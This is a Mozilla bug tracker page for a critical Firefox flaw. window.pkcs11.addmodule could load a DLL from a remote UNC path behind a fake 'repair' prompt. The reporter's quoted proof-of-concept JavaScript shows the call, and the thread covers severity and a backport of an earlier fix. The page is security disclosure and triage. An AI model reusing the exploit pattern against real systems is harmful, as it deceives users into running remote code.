Last Comment Bug 509413 - Remote PKCS11 module installation from UNC path
: Remote PKCS11 module installation from UNC path
[sg:critical][fix in 326628] requires...
: fixed1.9.0.14
Product: Core
Classification: Components
Component: Security: PSM (show other bugs)
: 1.9.0 Branch
: All All
-- major (vote)
: ---
Assigned To: Kai Engert (:kaie)
: David Keeler [:keeler] (use needinfo?)
Depends on: 326628
  Show dependency treegraph
Reported: 2009-08-10 08:33 PDT by Brandon Sterne (:bsterne)
Modified: 2009-09-12 14:00 PDT (History)
9 users (show)
samuel.sidler+old: blocking1.9.0.14+
dveditz: wanted1.9.0.x+
See Also:
Crash Signature:
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Description User image Brandon Sterne (:bsterne) 2009-08-10 08:33:11 PDT
Created attachment 393517 [details]
Module runs calc.exe when loaded

Dan Kaminsky reported this issue.  His full email to security@m.o:

You have a Javascript function that takes a DLL or a .so file as an argument in all builds of Firefox below 3.5?


Apparently this has garnered some internal attention over the last three years -- saw .

You guys sort of found that this can be thrown into a while(1) loop, but didn't realize it's a fully modal dialog and so all of Firefox is locked until the user hits OK.

What was really missed, however, was the fact that on Windows a UNC path can be used as an argument to LoadLibrary.  So the DLL can be loaded from a remote source.

Exploit looks like this:


  var str = "Error detected in Firefox Module NSP31337.bin.\n" +
            "Please click 'OK' to repair."

     ret=window.pkcs11.addmodule("\n\n\n" + str + "\n\n\n", "\\\\\\c$\\pkunkcs", 0, 0);


pkunkcs attached, launches calc.exe.  Obviously the path doesn't need to loop back to .
Comment 1 User image Samuel Sidler (old account; do not CC) 2009-08-10 08:43:31 PDT
Nelson: I understand you and Dan talked about this before he left. Any comments here?
Comment 2 User image Benjamin Smedberg [:bsmedberg] 2009-08-10 08:49:27 PDT
Isn't this just a straight duplicate of bug 326628? Other than "backport bug 326628 to the 1.9.0 branch" I'm not sure what the expected resolution would be.
Comment 3 User image Daniel Veditz [:dveditz] 2009-08-10 09:46:15 PDT
That's what Nelson said, too.

We missed the UNC path issue which makes it sg:critical rather than sg:moderate (bug 326628 comment 23). We should backport this--but note bug 326628 comment 52 / bug 495756.
Comment 4 User image Benjamin Smedberg [:bsmedberg] 2009-08-10 09:52:31 PDT
Why is it sg:critical? It can't be exploited without explicit user interaction.
Comment 5 User image Jesse Ruderman 2009-08-10 10:42:06 PDT
Between the prompt being confusing and the attacker being able to put the prompt in a while(1) loop, I imagine it would have a pretty high chance of success.
Comment 6 User image Nelson Bolyard (seldom reads bugmail) 2009-08-10 12:07:14 PDT
I agree with Benjamin that this is "just a straight duplicate of bug 326628"
and that the solution is "backport bug 326628 to the 1.9.0 branch".

The original design intent of the facilities for adding new PKCS#11 
modules to the mozilla browser was to offer two separate methods:
1) a UI dialog in the security manager preferences by which the user could
   do all the work for himself, 
2) a javascript method invokable from an XPI installer, by which the developer
   of the module could do the work for the user. provides minimal
information about both methods.

We expected that most PKCS#11 modules would be installed via an XPI.  

Somehow, somewhere along the way, it became possible to invoke the javascript 
method from a web page, and developers of deployments of PKCS#11 modules
began to rely on that.  But that was vulnerable, and now that has been taken 
away, leaving developers wondering what to do instead. 

IMO, the right thing to do is to steer those developers back to developing 
XPIs, rather than trying to teach users how to find and use the UI for this 
installation.  We really should encourage developers to consider the XPI
as the primary vehicle for that installation, IMO.
Comment 7 User image Samuel Sidler (old account; do not CC) 2009-08-10 16:41:13 PDT
Benjamin: Can you work on backporting bug 326628 to the 1.9.0 branch?
Comment 8 User image Benjamin Smedberg [:bsmedberg] 2009-08-11 12:38:21 PDT
Fixed or duplicate of bug 326628 (fixed for also).

Note You need to log in before you can comment on or make changes to this bug.